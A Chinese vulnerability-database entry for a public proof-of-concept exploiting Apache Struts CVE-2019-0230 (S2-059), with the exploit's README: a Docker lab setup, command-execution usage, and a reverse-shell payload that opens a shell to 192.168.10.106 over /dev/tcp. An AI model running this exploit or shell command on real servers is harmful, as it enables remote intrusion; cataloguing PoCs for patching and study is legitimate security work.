漏洞平台 - 免费 CVE 数据库与 AI 分析

POC详情: 233f8841088496d8779431c91ca3c1e89385456d

来源

https://github.com/tw-eason-tseng/CVE-2019-0230_Struts2S2-059

关联漏洞

标题:Apache Struts 代码执行漏洞 (CVE-2019-0230)
Description:Apache Struts是美国阿帕奇（Apache）基金会的一个开源项目，是一套用于创建企业级Java Web应用的开源MVC框架，主要提供两个版本框架产品，Struts 1和Struts 2。 Apache Struts 2.0.0版本至2.5.20版本中存在代码执行漏洞。攻击者可借助特制的请求利用该漏洞执行代码。

介绍

# CVE-2019-0230_Struts2S2-059

## How to use

### Build Struts252-059 Docker
```shell=
docker-compose up -d
```

### How To Use

python3 poc.py "URL" "shell"

Example(PoC)：
```shell=
python3 poc.py http://127.0.0.1:8080 "touch /tmp/1234"
```

![](https://i.imgur.com/prbzR7M.png)


Example(PoC)-2_Reverse Shell：
```shell=
python3 poc.py http://127.0.0.1:8080 "0<&196;exec 196<>/dev/tcp/192.168.10.106/5051; sh <&196 >&196 2>&196"
```
![](https://i.imgur.com/vKjnqej.png)


### Reference
1. [Struts2 S2-059 Remote Code Execution Vulnerablity(CVE-2019-0230)](https://github.com/vulhub/vulhub/tree/master/struts2/s2-059)
2. [struts2 s2-059远程代码执行漏洞（CVE-2019-0230）](https://www.freebuf.com/vuls/257494.html)
3. [java.lang.Runtime.exec() Payload Workarounds](http://www.jackson-t.ca/runtime-exec-payloads.html)

文件快照


 [4.0K]  /data/pocs/233f8841088496d8779431c91ca3c1e89385456d
├── [  92]  docker-compose.yml
├── [ 908]  poc.py
└── [ 830]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮件到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对 POC 代码进行快照，为了长期维护，请考虑为本地 POC 付费/捐赠，感谢您的支持。

支持本站 — 捐款将帮助我们持续运营

POC详情: 233f8841088496d8779431c91ca3c1e89385456d

来源

关联漏洞

介绍

文件快照

备注